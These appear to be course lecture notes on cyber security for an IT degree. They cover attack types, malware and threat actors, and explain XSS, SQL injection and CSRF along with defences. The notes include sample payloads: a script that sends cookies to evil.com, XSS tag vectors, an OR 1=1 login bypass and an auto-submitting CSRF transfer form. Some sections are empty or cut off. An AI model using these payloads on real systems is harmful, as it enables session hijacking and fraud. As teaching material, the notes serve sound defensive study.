Cyber Security
Cyber Security
ON
CYBER SECURITY
BS
IN
INFORMATION TECHNOLOGY
Cyber security is the most concerned matter as cyber threats and attacks are overgrowing.
Attackers are now using more sophisticated techniques to target the systems. Individuals,
small-scale businesses or large organization, are all being impacted. So, all these firms
whether IT or non-IT firms have understood the importance of Cyber Security and focusing
on adopting all possible measures to deal with cyber threats.
"Cyber security is primarily about people, processes, and technologies working together to
encompass the full range of threat reduction, vulnerability reduction, deterrence, international
engagement, incident response, resiliency, and recovery policies and activities, including
computer network operations, information assurance, law enforcement, etc."
OR
Cyber security is the body of technologies, processes, and practices designed to protect
networks, computers, programs and data from attack, damage or unauthorized access.
The term cyber security refers to techniques and practices designed to protect digital
data.
The data that is stored, transmitted or used on an information system.
OR
Cyber security is the protection of Internet-connected systems, including hardware, software,
and data from cyber attacks.
It is made up of two words one is cyber and other is security.
Cyber is related to the technology which contains systems, network and programs or
data.
Whereas security related to the protection which includes systems security, network
security and application and information security.
Why is cyber security important?
Listed below are the reasons why cyber security is so important in what’s become a
predominant digital world:
Because of the above reasons, cyber security has become an important part of the
business and the focus now is on developing appropriate response plans that minimize
the damage in the event of a cyber attack.
But, an organization or an individual can develop a proper response plan only when
he has a good grip on cyber security fundamentals.
CIA Triad
The CIA Triad is actually a security model that has been developed to help people think
about various parts of IT security.
CIA triad broken down:
Confidentiality:
It also means trying to keep the identity of authorized parties involved in sharing and holding
data private and anonymous.
Data encryption
Two-factor authentication
Biometric verification
Security tokens
Integrity
Cryptographic checksums
Using file permissions
Uninterrupted power supplies
Data backups
Availability
Availability is making sure that authorized parties are able to access the information when
needed.
1) Web-based attacks
2) System-based attacks
Web-based attacks
These are the attacks which occur on a website or web applications. Some of the important
web-based attacks are as follows-
1. Injection attacks
It is the attack in which some data will be injected into a web application to manipulate the
application and fetch the required information.
Example- SQL Injection, code Injection, log Injection, XML Injection etc.
2. DNS Spoofing
DNS Spoofing is a type of computer security hacking. Whereby a data is introduced into a
DNS resolver's cache causing the name server to return an incorrect IP address, diverting
traffic to the attackers computer or any other computer. The DNS spoofing attacks can go on
for a long period of time without being detected and can cause serious security issues.
3. Session Hijacking
It is a security attack on a user session over a protected network. Web applications create
cookies to store the state and user sessions. By stealing the cookies, an attacker can have
access to all of the user data.
4. Phishing
Phishing is a type of attack which attempts to steal sensitive information like user login
credentials and credit card number. It occurs when an attacker is masquerading as a
trustworthy entity in electronic communication.
5. Brute force
It is a type of attack which uses a trial and error method. This attack generates a large number
of guesses and validates them to obtain actual data like user password and personal
identification number. This attack may be used by criminals to crack encrypted data, or by
security, analysts to test an organization's network security.
6. Denial of Service
It is an attack which meant to make a server or network resource unavailable to the users. It
accomplishes this by flooding the target with traffic or sending it information that triggers a
crash. It uses the single system and single internet connection to attack a server. It can be
classified into the following-
Volume-based attacks- Its goal is to saturate the bandwidth of the attacked site, and is
measured in bit per second.
Application layer attacks- Its goal is to crash the web server and is measured in request per
second.
7. Dictionary attacks
This type of attack stored the list of a commonly used password and validated them to get
original password.
8. URL Interpretation
It is a type of attack where we can change the certain parts of a URL, and one can make a
web server to deliver web pages for which he is not authorized to browse.
It is a type of attack that allows an attacker to access unauthorized or essential files which is
available on the web server or to execute malicious files on the web server by making use of
the include functionality.
It is a type of attack that allows an attacker to intercepts the connection between client and
server and acts as a bridge between them. Due to this, an attacker will be able to read, insert
and modify the data in the intercepted connection.
System-based attacks
These are the attacks which are intended to compromise a computer or a computer network.
Some of the important system-based attacks are as follows-
1. Virus
It is a type of malicious software program that spread throughout the computer files without
the knowledge of a user. It is a self-replicating malicious computer program that replicates by
inserting copies of itself into other computer programs when executed. It can also execute
instructions that cause harm to the system.
2. Worm
3. Trojan horse
It is a malicious program that occurs unexpected changes to computer setting and unusual
activity, even when the computer should be idle. It misleads the user of its true intent. It
appears to be a normal application but when opened/executed some malicious code will run
in the background.
4. Backdoors
It is a method that bypasses the normal authentication process. A developer may create a
backdoor so that an application or operating system can be accessed for troubleshooting or
other purposes.
5. Bots
A bot (short for "robot") is an automated process that interacts with other network services.
Some bots program run automatically, while others only execute commands when they
receive specific input. Common examples of bots program are the crawler, chatroom bots,
and malicious bots.
Cyber threats are security incidents or circumstances with the potential to have a negative
outcome for your network or other data management systems.
Examples of common types of security threats include phishing attacks that result in the
installation of malware that infects your data, failure of a staff member to follow data
protection protocols that cause a data breach, or even a tornado that takes down your
company’s data headquarters, disrupting access.
Vulnerabilities are the gaps or weaknesses in a system that make threats possible and tempt
threat actors to exploit them.
Types of vulnerabilities in network security include but are not limited to SQL injections,
server misconfigurations, cross-site scripting, and transmitting sensitive data in a
non-encrypted plain text format.
When threat probability is multiplied by the potential loss that may result, cyber security
experts, refer to this as a risk.
What is a threat:
A threat is any incident that could negatively affect an asset – for example, if it’s lost,
knocked offline or accessed by an unauthorized party.
Intentional threats include things such as criminal hacking or a malicious insider stealing
information, whereas accidental threats generally involve employee error, a technical
malfunction or an event that causes physical damage, such as a fire or natural disaster.
Active attacks:
An active attack is a network exploit in which a hacker attempts to make changes to data
on the target or data en route to the target.
Masquerade: in this attack, the intruder pretends to be a particular user of a system to gain
access or to gain greater privileges than they are authorized for. A masquerade may be
attempted through the use of stolen login IDs and passwords, through finding security gaps
in programs or through bypassing the authentication mechanism.
Session replay: In this type of attack, a hacker steals an authorized user’s log in information
by stealing the session ID. The intruder gains access and the ability to do anything the
authorized user can do on the website.
Message modification: In this attack, an intruder alters packet header addresses to direct a
message to a different destination or modify the data on a target machine.
In a denial of service (DoS) attack, users are deprived of access to a network or web
resource. This is generally accomplished by overwhelming the target with more traffic than it
can handle.
Passive Attacks:Passive attacks are relatively scarce from a classification perspective, but
can be carried out with relative ease, particularly if the traffic is not encrypted.
Eavesdropping (tapping): the attacker simply listens to messages exchanged by two entities.
For the attack to be useful, the traffic must not be encrypted. Any unencrypted information,
such as a password sent in response to an HTTP request, may be retrieved by the attacker.
Traffic analysis: the attacker looks at the metadata transmitted in traffic in order to deduce
information relating to the exchange and the participating entities, e.g. the form of the
exchanged traffic (rate, duration, etc.). In the cases where encrypted data are used, traffic
analysis can also lead to attacks by cryptanalysis, whereby the attacker may obtain
information or succeed in unencrypting the traffic.
Hardware Attacks:
Common hardware attacks include:
Backdoor creation; the presence of hidden methods for bypassing normal computer
authentication systems
Counterfeiting product assets that can produce extraordinary operations and those
made to gain malicious access to systems.
Cyber warfare refers to the use of digital attacks -- like computer viruses and hacking --
by one country to disrupt the vital computer systems of another, with the aim of creating
damage, death and destruction. Future wars will see hackers using computer code to
attack an enemy's infrastructure, fighting alongside troops using conventional weapons
like guns and missiles.
Cyber warfare involves the actions by a nation-state or international organization to
attack and attempt to damage another nation's computers or information networks through,
for example, computer viruses or denial-of-service attacks.
Cyber Crime:
Cybercrime is criminal activity that either targets or uses a computer, a computer network
or a networked device.Cybercrime is committed by cybercriminals or hackers who want
to make money. Cybercrime is carried out by individuals or organizations.
Some cybercriminals are organized, use advanced techniques and are highly technically
skilled. Others are novice hackers.
Cyber Terrorism:
Cyber terrorism is the convergence of cyberspace and terrorism. It refers to unlawful
attacks and threats of attacks against computers, networks and the information stored
therein when done to intimidate or coerce a government or its people in furtherance of
political or social objectives.
Examples are hacking into computer systems, introducing viruses to vulnerable networks,
web site defacing, Denial-of-service attacks, or terroristic threats made via electronic
communication.
Cyber Espionage:
Cyber spying, or cyber espionage, is the act or practice of obtaining secrets and
information without the permission and knowledge of the holder of the information from
individuals, competitors, rivals, groups, governments and enemies for personal, economic,
political or military advantage using methods on the Internet.
Threat Actors
Threat actor is a generic term used to describe individuals who launch attacks
against other users and their computers (another generic word is simply attackers).
Many threat actors belong to organized gangs of young attackers, often clustered in
Eastern European, Asian, and Third World regions, who meet in hidden online dark
web forums to trade information, buy and sell stolen data and attacker tools, and
even coordinate attacks.
Script Kiddies
Script kiddies are individuals who want to attack computers yet they lack the
knowledge of computers and networks needed to do so. Script kiddies instead do
their work by downloading freely available automated attack software (called
open-source intelligence or scripts) from websites and using it to perform
malicious acts.
Hactivists
Another serious threat to an enterprise comes from its own employees, contractors, and
business partners, called insiders. For example, a healthcare worker disgruntled about
being passed over for a promotion might illegally gather health records on celebrities
and sell them to the media, or a securities trader who loses billions of dollars on bad
stock bets could use her knowledge of the bank’s computer security system to conceal
the losses through fake transactions.Defending Against Attacks
Layering
Information should be protected by layers of security. If one
layer is penetrated several more layers must still be breached, and each
layer is often more difficult or complicated than the previous. A layered
approach has the advantage of creating a barrier of multiple defenses that
can be coordinated to thwart a variety of attacks. A layered security
approach, also called defense-in-depth, can be useful in resisting a variety
of attacks. Layered security provides the most comprehensive protection.
Limiting
Limiting access to information reduces the threat against it. This means
that only those personnel who must use the data should have access to it. In
addition, the type of access they have should be limited to what those people
need to perform their jobs. For example, access to the human resource
database for an enterprise should be limited to only employees who have a
genuine need to access it, such as human resource personnel or vice
presidents. And, the type of access also should be restricted: human resource
employees may be able to view employee salaries but not change them.
Diversity
Information security diversity may be achieved in several ways. For example, some
enterprises use security products provided by different manufacturers (vendor
diversity).Or, the groups who are responsible for regulating access to a system
(control diversity) are also different, so that those who perform technical controls
(using technology as a basis for controlling the access and usage of sensitive data)
are different from those personnel who administer the broad administrative
controls (regulating the human factors of security).
Obscurity
Simplicity
Because attacks can come from a variety of sources and in many ways,
information security is by its very nature complex. Yet the more complex it
becomes, the more difficult it is to understand. A security guard who does not
understand how motion detectors interact with infrared trip lights may not know
what to do when one system alarm shows an intruder but the other does not. In
addition, complex systems allow many opportunities for something to go wrong.
Malware
Malware, short for malicious software, is an umbrella term used to refer to a variety of
forms of hostile or intrusive software. Cybercriminals design malware to compromise
computer functions, steal data, bypass access controls, and otherwise cause harm to the
host computer, its applications or data.
Researchers classify the many types of malware in several different ways, including:
Adware
Many consider adware that collects data without your consent to be malicious adware.
Another example of malicious adware is intrusive pop-up advertisements for supposed
fixes for non-existent computer viruses or performance issues.
Spyware
Spyware is, as the name implies, software that spies on you. Designed to monitor and
capture your Web browsing and other activities, spyware, like adware, will often send
your browsing activities to advertisers. Spyware, however, includes capabilities not found
in adware. It may, for example, also capture sensitive information like banking accounts,
passwords, or credit card information.
While not all spyware is malicious, it is controversial because it can violate privacy and
has the potential to be abused.
Computer Virus
Another characteristic common to viruses is that they are covert, making them hard to
detect. Viruses arrive uninvited, hide in secrecy, reproduce by infecting other files when
executed, and usually work in obscurity.
Worm
Like a virus, worms are infectious and cybercriminals design them to replicate themselves.
However, a worm replicates without targeting and infecting specific files that are already
present on a computer. Worms carry themselves in their own containers and often confine
their activities to what they can accomplish inside the application that moves them. They
use a computer network to spread, relying on security failures on the target computer to
access it, and steal or delete data.
Many worms are designed only to spread and do not attempt to change the systems that
they pass through.
Trojan
The payload can be anything but is usually a form of a backdoor that allows attackers
unauthorized access to the affected computer. Trojans also give cybercriminals access to
the personal information of a user like IP addresses, passwords and banking details. They
are often used to install keyloggers that can easily capture account names and passwords,
or credit card data, and disclose the data to the malware actor. Most ransomware attacks
are carried out using a Trojan horse, by housing the harmful code inside an apparently
harmless piece of data.
Security experts consider Trojans to be among the most dangerous types of malware
today, particularly Trojans designed to steal financial information from users. Some
insidious types of Trojans actually claim to remove any viruses from a computer but
instead introduce viruses.
Keylogger
Rootkit
A Rootkit is a set of software tools, typically malicious, that gives an unauthorized user
privileged access to a computer. Once a rootkit has been installed, the controller of the
rootkit has the ability to remotely execute files and change system configurations on the
host machine.
When a rootkit is discovered, some experts recommend completely wiping your hard
drive and reinstalling everything from scratch.
Often, a phishing attack lures an individual to click on a malware-infected URL that fools
the victim into thinking they are visiting their bank or another online service. The
malicious site then captures the victim’s ID and password, or other personal or financial
information.
Also known as robots, bots are malicious programs designed to infiltrate a computer and
automatically respond to and carry out instructions received from a central command and
control server. Bots can self-replicate (like worms) or replicate via user action (like
viruses and Trojans).
Ransomware
Ransomware is a type of malware that locks the data on a victim’s computer, typically by
encryption. The cybercriminal behind the malware demands payment before decrypting
the ransomed data and returning access to the victim.
The motive for ransomware attacks is nearly always monetary, and unlike other types of
attacks, the victim is usually notified that an exploit has occurred and is given instructions
for making payment to have the data restored to normal.
The above list describes only the most common types of malware in use today. In reality,
there are many additional types and variations of malware, and cybercriminals are
continually developing more, although most are simply new techniques to carry out one
of the objectives described above.
It is also important to understand that Web security testing is not only about
testing the security features (e.g., authentication and authorization) that may be
implemented in the application. It is equally important to test that other features
are implemented in a secure way (e.g., business logic and the use of proper
input validation and output encoding). The goal is to ensure that the functions
exposed in the Web application are secure.
Misconfiguration attacks:
If unnecessary services are enabled or default configuration files are used,
verbose/error information is not masked; an attacker can compromise the web
server through various attacks like password cracking, Error-based SQL
injection, Command Injection, etc.
Phishing Attack:
An attacker may redirect the victim to malicious websites by sending him/her a
malicious link by email which looks authentic, but redirects him/her to
malicious web page thereby stealing their data.
There are a lot of other web application attacks which can lead to a web server
attack- Parameter form tampering, Cookie tampering, unvalidated inputs, SQL
injection, Buffer overflow attacks.
Attack Results
A company’s ability to use online resources to capture and store customer data
has many benefits, but it also opens the door to malicious attackers. Fortunately,
there are methods you can employ to provide analysis and protection for your
site and its underlying servers and databases. They include the following:
A web page or web application is vulnerable to XSS if it uses unsanitized user input in the
output that it generates. This user input must then be parsed by the victim’s browser. XSS
attacks are possible in VBScript, ActiveX, Flash, and even CSS. However, they are most
common in JavaScript, primarily because JavaScript is fundamental to most browsing
experiences.
If an attacker can abuse an XSS vulnerability on a web page to execute arbitrary JavaScript in
a user’s browser, the security of that vulnerable website or vulnerable web application and its
users has been compromised. XSS is not the user’s problem like any other security
vulnerability. If it is affecting your users, it affects you.
Cross-site Scripting may also be used to deface a website instead of targeting the user. The
attacker can use injected scripts to change the content of the website or even redirect the
browser to another web page, for example, one that contains malicious code.
XSS vulnerabilities are perceived as less dangerous than for example SQL
Injection vulnerabilities. Consequences of the ability to execute JavaScript on a web page
may not seem dire at first. Most web browsers run JavaScript in a very tightly controlled
environment. JavaScript has limited access to the user’s operating system and the user’s files.
However, JavaScript can still be dangerous if misused as part of malicious content:
Malicious JavaScript has access to all the objects that the rest of the web page has
access to. This includes access to the user’s cookies. Cookies are often used to store
session tokens. If an attacker can obtain a user’s session cookie, they can impersonate
that user, perform actions on behalf of the user, and gain access to the user’s sensitive
data.
JavaScript can read the browser DOM and make arbitrary modifications to it. Luckily,
this is only possible within the page where JavaScript is running.
JavaScript can use the XMLHttpRequest object to send HTTP requests with arbitrary
content to arbitrary destinations.
JavaScript in modern browsers can use HTML5 APIs. For example, it can gain access
to the user’s geolocation, webcam, microphone, and even specific files from the
user’s file system. Most of these APIs require user opt-in, but the attacker can use
social engineering to go around that limitation.
The above, in combination with social engineering, allow criminals to pull off advanced
attacks including cookie theft, planting trojans, keylogging, phishing, and identity theft. XSS
vulnerabilities provide the perfect ground to escalate attacks to more serious ones. Cross-site
Scripting can also be used in conjunction with other types of attacks, for example, Cross-Site
Request Forgery (CSRF).
Reflected XSS, where the malicious script comes from the current HTTP request.
Stored XSS, where the malicious script comes from the website's database.
DOM-based XSS, where the vulnerability exists in client-side code rather than
server-side code.
Reflected XSS is the simplest variety of cross-site scripting. It arises when an application
receives data in an HTTP request and includes that data within the immediate response in an
unsafe way.
Here is a simple example of a reflected XSS vulnerability:
The application doesn't perform any other processing of the data, so an attacker can easily
construct an attack like this:
https://insecure-website.com/status?message=<script>/*+Bad+stuff+here...+*/</script>
<p>Status: <script>/* Bad stuff here... */</script></p>
If the user visits the URL constructed by the attacker, then the attacker's script executes in the
user's browser, in the context of that user's session with the application. At that point, the
script can carry out any action, and retrieve any data, to which the user has access.
Stored XSS (also known as persistent or second-order XSS) arises when an application
receives data from an untrusted source and includes that data within its later HTTP responses
in an unsafe way.
The data in question might be submitted to the application via HTTP requests; for example,
comments on a blog post, user nicknames in a chat room, or contact details on a customer
order. In other cases, the data might arrive from other untrusted sources; for example, a
webmail application displaying messages received over SMTP, a marketing application
displaying social media posts, or a network monitoring application displaying packet data
from network traffic.
Here is a simple example of a stored XSS vulnerability. A message board application lets
users submit messages, which are displayed to other users:
The application doesn't perform any other processing of the data, so an attacker can easily
send a message that attacks other users:
DOM-based XSS (also known as DOM XSS) arises when an application contains some
client-side JavaScript that processes data from an untrusted source in an unsafe way, usually
by writing the data back to the DOM.
In the following example, an application uses some JavaScript to read the value from an input
field and write that value to an element within the HTML:
You searched for: <img src=1 onerror='/* Bad stuff here... */'>
In a typical case, the input field would be populated from part of the HTTP request, such as a
URL query string parameter, allowing the attacker to deliver an attack using a malicious URL,
in the same manner as reflected XSS.
1. To run malicious JavaScript code in a victim’s browser, an attacker must first find a
way to inject malicious code (payload) into a web page that the victim visits.
2. After that, the victim must visit the web page with the malicious code. If the attack is
directed at particular victims, the attacker can use social engineering and/or phishing
to send a malicious URL to the victim.
For step one to be possible, the vulnerable website needs to directly include user input in its
pages. An attacker can then insert a malicious string that will be used within the web page
and treated as source code by the victim’s browser. There are also variants of XSS attacks
where the attacker lures the user to visit a URL using social engineering and the payload is
part of the link that the user clicks.
The following is a snippet of server-side pseudocode that is used to display the most recent
comment on a web page:
The above script simply takes the latest comment from a database and includes it in an
HTML page. It assumes that the comment printed out consists of only text and contains no
HTML tags or other code. It is vulnerable to XSS, because an attacker could submit a
comment that contains a malicious payload, for example:
<script>doSomethingEvil();</script>
The web server provides the following HTML code to users that visit this web page:
When the page loads in the victim’s browser, the attacker’s malicious script executes. Most
often, the victim does not realize it and is unable to prevent such an attack.
<script>window.location="http://evil.com/?cookie=" + document.cookie</script>
1. The attacker injects a payload into the website’s database by submitting a vulnerable
form with malicious JavaScript content.
2. The victim requests the web page from the web server.
3. The web server serves the victim’s browser the page with attacker’s payload as part of
the HTML body.
4. The victim’s browser executes the malicious script contained in the HTML body. In
this case, it sends the victim’s cookie to the attacker’s server.
5. The attacker now simply needs to extract the victim’s cookie when the HTTP request
arrives at the server.
6. The attacker can now use the victim’s stolen cookie for impersonation.
To learn more about how XSS attacks are conducted, you can refer to an article titled A
comprehensive tutorial on cross-site scripting.
<script> tag
The <script> tag is the most straightforward XSS payload. A script tag can reference external
JavaScript code or you can embed the code within the script tag itself.
JavaScript events
JavaScript event attributes such as onload and onerror can be used in many different tags.
This is a very popular XSS attack vector.
<body> tag
An XSS payload can be delivered inside the <body> by using event attributes (see above) or
other more obscure attributes such as the background attribute.
<img> tag
<!-- <img> tag XSS --><img src="javascript:alert("XSS");"><!-- tag XSS using lesser
-known attributes --><img dynsrc="javascript:alert('XSS')"><img lowsrc="javascript:alert
('XSS')">
<iframe> tag
The <iframe> tag lets you embed another HTML page in the current page. An IFrame may
contain JavaScript but JavaScript in the IFrame does not have access to the DOM of the
parent page due to the Content Security Policy (CSP) of the browser. However, IFrames are
still very effective for pulling off phishing attacks.
<input> tag
In some browsers, if the type attribute of the <input> tag is set to image, it can be
manipulated to embed a script.
<link> tag
The <link> tag, which is often used to link to external style sheets, may contain a script.
<table> tag
The background attribute of the <table> and <td> tags can be exploited to refer to a script
instead of an image.
<div> tag
The <div> tag, similar to the <table> and <td> tags, can also specify a background and
therefore embed a script.
<object> tag
The <object> tag can be used to include a script from an external site.
To keep yourself safe from XSS, you must sanitize your input. Your application code should
never output data received as input directly to the browser without checking it for malicious
code.
For more details, refer to the following articles: Preventing XSS Attacks and How to Prevent
DOM-based Cross-site Scripting. You can also find useful information in the XSS Prevention
Cheat Sheet maintained by the OWASP organization.
How to Prevent Cross-site Scripting (XSS)
Treat all user input as untrusted. Any user input that is used as part of
HTML output introduces a risk of an XSS. Treat input from
authenticated and/or internal users the same way that you treat public
input.
An SQL Injection vulnerability may affect any website or web application that uses an
SQL database such as MySQL, Oracle, SQL Server, or others. Criminals may use it to
gain unauthorized access to your sensitive data: customer information, personal data,
trade secrets, intellectual property, and more. SQL Injection attacks are one of the oldest,
most prevalent, and most dangerous web application vulnerabilities. The OWASP
organization (Open Web Application Security Project) lists injections in their OWASP
Top 10 2017 document as the number one threat to web application security.
SQL is a query language that was designed to manage data stored in relational databases.
You can use it to access, modify, and delete data. Many web applications and websites
store all the data in SQL databases. In some cases, you can also use SQL commands to
run operating system commands. Therefore, a successful SQL Injection attack can have
very serious consequences.
Attackers can use SQL Injections to find the credentials of other users in the
database. They can then impersonate these users. The impersonated user may be a
database administrator with all database privileges.
SQL lets you select and output data from the database. An SQL Injection
vulnerability could allow the attacker to gain complete access to all data in a
database server.
SQL also lets you alter data in a database and add new data. For example, in a
financial application, an attacker could use SQL Injection to alter balances, void
transactions, or transfer money to their account.
You can use SQL to delete records from a database, even drop tables. Even if the
administrator makes database backups, deletion of data could affect application
availability until the database is restored. Also, backups may not cover the most
recent data.
In some database servers, you can access the operating system using the database
server. This may be intentional or accidental. In such case, an attacker could use
an SQL Injection as the initial vector and then attack the internal network behind a
firewall.
SQL Injection can be classified into three major categories – In-band SQLi, Inferential
SQLi and Out-of-band SQLi.
The two most common types of in-band SQL Injection are Error-based
SQLi and Union-based SQLi.
Error-based SQLi
Error-based SQLi is an in-band SQL Injection technique that relies on error messages
thrown by the database server to obtain information about the structure of the database. In
some cases, error-based SQL injection alone is enough for an attacker to enumerate an
entire database. While errors are very useful during the development phase of a web
application, they should be disabled on a live site, or logged to a file with restricted
access instead.
Union-based SQLi
Union-based SQLi is an in-band SQL injection technique that leverages the UNION SQL
operator to combine the results of two or more SELECT statements into a single result
which is then returned as part of the HTTP response.
Depending on the result, the content within the HTTP response will change, or remain the
same. This allows an attacker to infer if the payload used returned true or false, even
though no data from the database is returned. This attack is typically slow (especially on
large databases) since an attacker would need to enumerate a database, character by
character.
Time-based SQL Injection is an inferential SQL Injection technique that relies on sending
an SQL query to the database which forces the database to wait for a specified amount of
time (in seconds) before responding. The response time will indicate to the attacker
whether the result of the query is TRUE or FALSE.
Depending on the result, an HTTP response will be returned with a delay, or returned
immediately. This allows an attacker to infer if the payload used returned true or false,
even though no data from the database is returned. This attack is typically slow
(especially on large databases) since an attacker would need to enumerate a database
character by character.
Out-of-band SQLi
Out-of-band SQL Injection is not very common, mostly because it depends on features
being enabled on the database server being used by the web application. Out-of-band
SQL Injection occurs when an attacker is unable to use the same channel to launch the
attack and gather results.
Out-of-band techniques, offer an attacker an alternative to inferential time-based
techniques, especially if the server responses are not very stable (making an inferential
time-based attack unreliable).
Out-of-band SQLi techniques would rely on the database server’s ability to make DNS or
HTTP requests to deliver data to an attacker. Such is the case with Microsoft SQL
Server’s xp_dirtree command, which can be used to make DNS requests to a server an
attacker controls; as well as Oracle Database’s UTL_HTTP package, which can be used
to send HTTP requests from SQL and PL/SQL to a server an attacker controls.
These input fields are vulnerable to SQL Injection. An attacker could use SQL commands
in the input in a way that would alter the SQL statement executed by the database server.
For example, they could use a trick involving a single quote and set the passwd field to:
password' OR 1=1
Because of the OR 1=1 statement, the WHERE clause returns the first id from
the users table no matter what the username and password are. The first user id in a
database is very often the administrator. In this way, the attacker not only bypasses
authentication but also gains administrator privileges. They can also comment out the rest
of the SQL statement to control the execution of the SQL query further:
The following HTTP request is a normal request that a legitimate user would send:
The artist parameter is vulnerable to SQL Injection. The following payload modifies the
query to look for an inexistent record. It sets the value in the URL query string to -1. Of
course, it could be any other value that does not exist in the database. However, a
negative value is a good guess because an identifier in a database is rarely a negative
number.
In SQL Injection, the UNION operator is commonly used to attach a malicious SQL query
to the original query intended to be run by the web application. The result of the injected
query will be joined with the result of the original query. This allows the attacker to
obtain column values from other tables.
If you discover an SQL Injection vulnerability, for example using an Acunetix scan, you
may be unable to fix it immediately. For example, the vulnerability may be in open
source code. In such cases, you can use a web application firewall to sanitize your input
temporarily.
How to Prevent SQL Injections (SQLi)
CSRF Attacks
Cross-site Request Forgery, also known as CSRF, Sea Surf, or XSRF, is an attack
whereby an attacker tricks a victim into performing actions on their behalf. The impact of
the attack depends on the level of permissions that the victim has. Such attacks take
advantage of the fact that a website completely trusts a user once it can confirm that the
user is indeed who they say they are.
Cross-site Request Forgery is considered a sleeping giant in the world of web application
security. It is often not taken as seriously as it should even though it can prove to be a
stealthy and powerful attack if executed properly. It is also a common attack, which is
why it has secured a spot on the OWASP Top 10 list several times in a row. However, an
exploited Cross-site Scripting vulnerability (XSS) is more of a risk than any CSRF
vulnerability because CSRF attacks have a major limitation. CSRF only allows for state
changes to occur and therefore the attacker cannot receive the contents of the HTTP
response.
When a request is made to a website, the victim’s browser checks if it has any cookies
that are associated with the origin of that website and that need to be sent with the HTTP
request. If so, these cookies are included in all requests sent to this website. The cookie
value typically contains authentication data and such cookies represent the user’s session.
This is done to provide the user with a seamless experience, so they are not required to
authenticate again for every page that they visit. If the website approves of the session
cookie and considers the user session still valid, an attacker may use CSRF to send
requests as if the victim was sending them. The website is unable to distinguish between
requests being sent by the attacker and those sent by the victim since requests are always
being sent from the victim’s browser with their own cookie. A CSRF attack simply takes
advantage of the fact that the browser sends the cookie to the website automatically with
each request.
Cross-site Request Forgery will only be effective if a victim is authenticated. This means
that the victim must be logged in for the attack to succeed. Since CSRF attacks are used
to bypass the authentication process, there may be some elements that are not affected by
these attacks even though they are not protected against them, such as publicly accessible
content. For example, a public contact form on a website is safe from CSRF. Such HTML
forms do not require the victim to have any privileges for form submission. CSRF only
applies to situations where a victim is able to perform actions that are not accessible to
everyone.
When the victim clicks the link provided by the attacker using social engineering, the
victim is directed to the attacker’s malicious site. This website executes a script that
triggers the user’s web browser to send an unsolicited request. The victim is not aware
that this unsolicited client-side request is being sent. However, server-side it appears as if
the user sent the request because it includes cookies used to verify that the user is who
they say they are.
Let’s imagine that www.example.com processes fund transfers using a GET request that
includes two parameters: the amount that is to be transferred and the identifier of the
person to receive the money transfer. The below example shows a legitimate URL, which
will request that the web app transfers 100,000 units of the appropriate currency to Fred’s
account.
http://example.com/transfer?amount=1000000&account=Fred
The request includes a cookie that represents the authenticated user so there is no need to
define the source account for the transfer. If a normal user accesses this URL, they need
to authenticate so that the application knows the account from which funds are to be
withdrawn. Using CSRF, we can trick a victim into sending the request that the attacker
wants while authenticated as the victim.
If the exploited application expects a GET request, the attacker can include a
malicious <img> tag on their own website. Instead of linking to an image, this tag sends a
request to the bank’s web app:
Under normal circumstances, the user’s browser automatically sends cookies that are
related to that website. This causes the victim to perform a state change on behalf of the
attacker. In this case, the state change is a transfer of funds.
Note that this example is very simple and it does not necessarily reflect the real-world but
it shows very well how CSRF attacks work. However, similar vulnerabilities based on
GET appeared in popular software in the past (read more about it on Wikipedia).
Tricking a victim into sending a POST request may be slightly more difficult. With a
GET request, the attacker only needs the victim to send a URL with all the necessary
information. In the case of POST, a request body must be appended to the request.
However, an attacker can design a malicious website to include JavaScript that causes the
user’s browser to send an unsolicited POST request as soon as the page loads.
The following JavaScript example shows the onload function, which automatically sends
a request from the victim’s browser as soon as the page loads.
<body onload="document.csrf.submit()">
<form action="http://example.com/transfer" method="POST" name="csrf">
<input type="hidden" name="amount" value="1000000">
<input type="hidden" name="account" value="Fred"></form>
As soon as the page loads, the JavaScript onload function ensures that the hidden form is
submitted, which will in turn send the POST request. The form includes two parameters
and their values that have been set up by the attacker. The POST target, example.com,
identifies the request as legitimate because it includes the victim’s cookies.
An attacker can also make use of an IFrame with attributes that make it invisible. Using
the same onload function, the attacker can load the IFrame containing a malicious web
page and cause a request to be sent as soon as the IFrame loads. Another option is to use
XMLHttpRequest technology.
Preventing CSRF Vulnerabilities
Security experts propose many CSRF prevention mechanisms. This includes, for example,
using a referer header, using the HttpOnly flag, sending an X-Requested-With custom
header using jQuery, and more. Unfortunately, not all of them are effective in all
scenarios. In some cases, they are ineffective and in other cases, they are difficult to
implement in a particular application or have side effects. The following implementations
prove to be effective for a variety of web apps while still providing protection against
CSRF attacks. For more advanced CSRF prevention options, see the CSRF prevention
cheat sheet managed by OWASP.
This CSRF protection method is called the synchronizer token pattern. It protects the
form against Cross-site Request Forgery attacks because an attacker would also need to
guess the token to successfully trick a victim into sending a valid request. The token
should also be invalidated after some time and after the user logs out. Anti-CSRF tokens
are often exposed via AJAX: sent as headers or request parameters with AJAX requests.
Same-Site Cookies
CSRF attacks are only possible because cookies are always sent with any requests that are
sent to a particular origin related to that cookie (see the definition of the same-origin
policy). You can set a flag for a cookie that turns it into a same-site cookie. A same-site
cookie is a cookie that can only be sent if the request is being made from the origin
related to the cookie (not cross-domain). The cookie and the request source are
considered to have the same origin if the protocol, port (if applicable) and host (but not
the IP address) are the same for both.
A current limitation of same-site cookies is that unlike for example Chrome or Firefox,
not all current browsers support them and older browsers do not work with web apps that
use same-site cookies (click here for a list of supported browsers). At the moment,
same-site cookies are better suited as an additional defense layer due to this limitation.
Therefore, you should only use them along with other CSRF protection mechanisms.
Conclusion
Cookies are intrinsically vulnerable to CSRF because they are automatically sent with
each request. This allows attackers to easily craft malicious requests that lead to CSRF.
Although the attacker cannot obtain the response body or the cookie itself, they can
perform actions with the victim’s elevated rights. The impact of a CSRF vulnerability is
related to the privileges of the victim. While sensitive information retrieval is not the
main scope of a CSRF attack, state changes may have an adverse effect on the exploited
web application.
Fortunately, it’s easy to test if your website or web application is vulnerable to CSRF and
other vulnerabilities by running an automated web scan using the Acunetix vulnerability
scanner, which includes a specialized CSRF scanner module. Take a demo and find out
more about running CSRF scans against your website or web application.
Security planning:
Contents of security planning:
A security plan identifies and organizes the security activities for a computing system. The
plan is both a description of the current situation and a plan for improvement. Every security
plan must address seven issues.
1. Policy, indicating the goals of a computer security effort and the willingness of the people
involved to work to achieve those goals
2. Current state, describing the status of security at the time of the plan
3. Requirements, recommending ways to meet the security goals
4. Recommended controls, mapping controls to the vulnerabilities identified in the policy
and requirements
5. Accountability, describing who is responsible for each security activity
6. Timetable, identifying when different security functions are to be done
7. Continuing attention, specifying a structure for periodically updating the security plan
1. Policy:
To be able to plan for security, an organization must understand the vulnerabilities to which it
